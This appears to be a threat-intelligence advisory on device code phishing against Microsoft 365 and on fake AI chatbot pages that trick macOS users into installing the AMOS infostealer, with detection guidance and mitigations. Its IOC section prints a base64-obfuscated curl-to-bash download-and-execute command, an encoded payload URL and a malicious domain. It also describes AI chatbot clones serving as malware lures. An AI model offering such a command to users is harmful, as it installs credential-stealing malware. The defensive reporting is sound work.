Social Engineering Leveled Up. Has Your Security Program?

What Happened

Cybercriminals are using highly deceptive tactics, such as fake AI chatbot instructions and legitimate Microsoft login prompts, to trick people into handing over access to their accounts and devices. Organizations using cloud services like Microsoft 365 and individuals using macOS are primarily targeted. This matters because these attacks easily bypass traditional security measures like multi-factor authentication (MFA) and antivirus software by blending in with normal, everyday activities. Organizations should monitor for unusual account behavior, speed up their response to security alerts, and train employees to be cautious of unexpected login prompts or copying commands from the internet.

Key Takeaways

• Attackers are increasingly abusing trusted workflows, AI platforms, and legitimate infrastructure to bypass traditional prevention controls.
• Device code phishing campaigns (e.g., EvilTokens) allow attackers to bypass MFA and gain persistent session tokens without stealing passwords.
• Malicious instructions on fake AI chatbots (like ChatGPT clones) are tricking macOS users into executing terminal commands that install the AMOS infostealer.
• Security programs must shift focus from pure prevention to resilience, emphasizing identity threat detection, behavioral monitoring, and rapid response.
• Legitimate cloud platforms like Railway and Cloudflare are being weaponized to host Phishing-as-a-Service (PHaaS) infrastructure.

Affected Systems

• macOS
• Microsoft 365
• Cloud Identity Platforms
• OAuth Integrations

Attack Chain

Attackers leverage SEO poisoning or fake AI chatbot pages to present users with malicious terminal commands disguised as routine troubleshooting steps. For macOS users, executing these commands downloads and installs the AMOS infostealer. In parallel campaigns, attackers use Phishing-as-a-Service platforms like EvilTokens hosted on legitimate infrastructure (e.g., Railway) to initiate device code phishing. Victims are tricked into entering a Microsoft OAuth device code, granting the attacker persistent, MFA-bypassed session tokens to access corporate resources like email and SharePoint.

Detection Availability

• YARA Rules: No
• Sigma Rules: No
• Snort/Suricata Rules: No
• KQL Queries: No
• Splunk SPL Queries: No
• EQL Queries: No
• Other Detection Logic: No

The article discusses strategic detection concepts and behavioral patterns but does not provide specific YARA, Sigma, or other query-based detection rules.

Detection Engineering Assessment

EDR Visibility: Medium — EDR can catch the macOS bash/curl execution, but device code phishing occurs entirely in the cloud/identity provider layer, bypassing endpoint telemetry. Network Visibility: Low — Traffic for device code phishing goes to legitimate Microsoft endpoints, and malicious payloads may be hosted on legitimate cloud infrastructure (Railway, Cloudflare). Detection Difficulty: Hard — Attacks blend into normal workflows, utilizing legitimate OAuth flows and trusted infrastructure, making signature-based detection highly ineffective.

Required Log Sources

• Azure AD Sign-in Logs
• Azure AD Audit Logs
• macOS Unified Log
• EDR Process Telemetry

Hunting Hypotheses

Hypothesis	Telemetry	ATT&CK Stage	FP Risk
Look for unusual device code authentication flows in Azure AD logs, especially from unexpected locations or followed by immediate access to sensitive SharePoint/OneDrive resources.	Cloud Identity/Azure AD Logs	Credential Access	Medium
Search for macOS endpoint telemetry showing bash executing curl commands that pipe base64 decoded strings directly into execution.	EDR Process Telemetry	Execution	Low

Control Gaps

• MFA Bypass via Device Code Phishing
• Lack of Identity Threat Detection and Response (ITDR)
• Over-reliance on static IOC blocking

Key Behavioral Indicators

• Unexpected device code login events
• Cross-tenant identity behavior anomalies
• Terminal commands executing base64 decoded URLs

False Positive Assessment

• High

Recommendations

Immediate Mitigation

• Review Azure AD logs for anomalous device code authentication events.
• Investigate macOS endpoints for recent execution of suspicious curl/bash commands.

Infrastructure Hardening

• Implement Identity Threat Detection and Response (ITDR) capabilities.
• Restrict or disable Microsoft device code flow if not required for business operations.

User Protection

• Deploy EDR on macOS devices to monitor for suspicious terminal executions.
• Implement cross-tenant visibility into identity and session behavior.

Security Awareness

• Train users to recognize device code phishing lures and the dangers of copying terminal commands from AI chatbots or search results.
• Establish clear ownership and response procedures for identity-based alerts to reduce response times.

MITRE ATT&CK Mapping

• T1566.002 - Phishing: Spearphishing Link
• T1528 - Steal Application Access Token
• T1059.004 - Command and Scripting Interpreter: Unix Shell
• T1199 - Trusted Relationship
• T1550.004 - Use Alternate Authentication Material: Web Session Cookie

Additional IOCs

• Domains:
  • putuartana[.]com - Domain hosting the AMOS infostealer payload.
• Command Lines:
  • Purpose: Download and execute a malicious payload (AMOS infostealer) disguised as a macOS disk cleanup command. | Tools: bash, curl, base64, echo | Stage: Execution / Payload Delivery | /bin/bash -c "$(curl -fsSL $(echo <base64_payload> | base64 -d))"
• Other:
  • aHR0cHM6Ly9wdXR1YXJ0YW5hLMNvbS9jbGVhbmRwdA== - Base64 encoded URL used in the malicious macOS terminal command.